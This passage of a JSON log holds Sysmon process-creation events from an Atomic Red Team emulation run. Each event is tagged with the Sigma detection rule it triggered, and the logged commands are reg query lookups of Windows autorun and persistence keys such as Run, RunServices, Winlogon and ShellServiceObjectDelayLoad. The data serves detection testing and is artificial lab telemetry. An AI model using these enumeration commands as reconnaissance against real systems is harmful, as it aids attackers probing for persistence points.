(WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010E83B3100","ParentProcessId":2888,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010413E3100","ProcessId":5348,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.176"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3682,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.180586Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-00107A403100","ProcessId":5984,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.212"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3683,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.227372Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-00107A403100","ParentProcessId":5984,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010CC423100","ProcessId":5256,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.238"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3684,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.249442Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-001009453100","ProcessId":5016,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.284"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3685,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.304938Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-001009453100","ParentProcessId":5016,"ProcessGuid":"747F3D96-D87C-5D31-0000-00105B473100","ProcessId":6208,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.327"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3686,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.335446Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-001097493100","ProcessId":1680,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.377"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3687,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.389557Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-001097493100","ParentProcessId":1680,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010E94B3100","ProcessId":3680,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.409"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3688,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.413390Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010264E3100","ProcessId":1428,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.447"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3689,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.463556Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010264E3100","ParentProcessId":1428,"ProcessGuid":"747F3D96-D87C-5D31-0000-001078503100","ProcessId":3220,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.493"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3690,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.497481Z"}},"Version":5}}}},{"detection":["Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010B4523100","ParentProcessId":4016,"ProcessGuid":"747F3D96-D87C-5D31-0000-001006553100","ProcessId":5024,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.575"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3692,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.585243Z"}},"Version":5}}}},{"detection":["Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-00103F573100","ParentProcessId":2440,"ProcessGuid":"747F3D96-D87C-5D31-0000-001080593100","ProcessId":4360,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.669"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3694,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.678107Z"}},"Version":5}}}},{"detection":["Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010CA5B3100","ParentProcessId":956,"ProcessGuid":"747F3D96-D87C-5D31-0000-00101D5E3100","ProcessId":3608,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.739"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3696,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.743506Z"}},"Version":5}}}},{"detection":["Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-001056603100","ParentProcessId":6832,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010A8623100","ProcessId":6436,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.803"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3698,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.807707Z"}},"Version":5}}}},{"detection":["Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010E1643100","ParentProcessId":5936,"ProcessGuid":"747F3D96-D87C-5D31-0000-001033673100","ProcessId":7144,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.865"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3700,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.868916Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-00107C693100","ProcessId":1740,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.900"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3701,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.921206Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 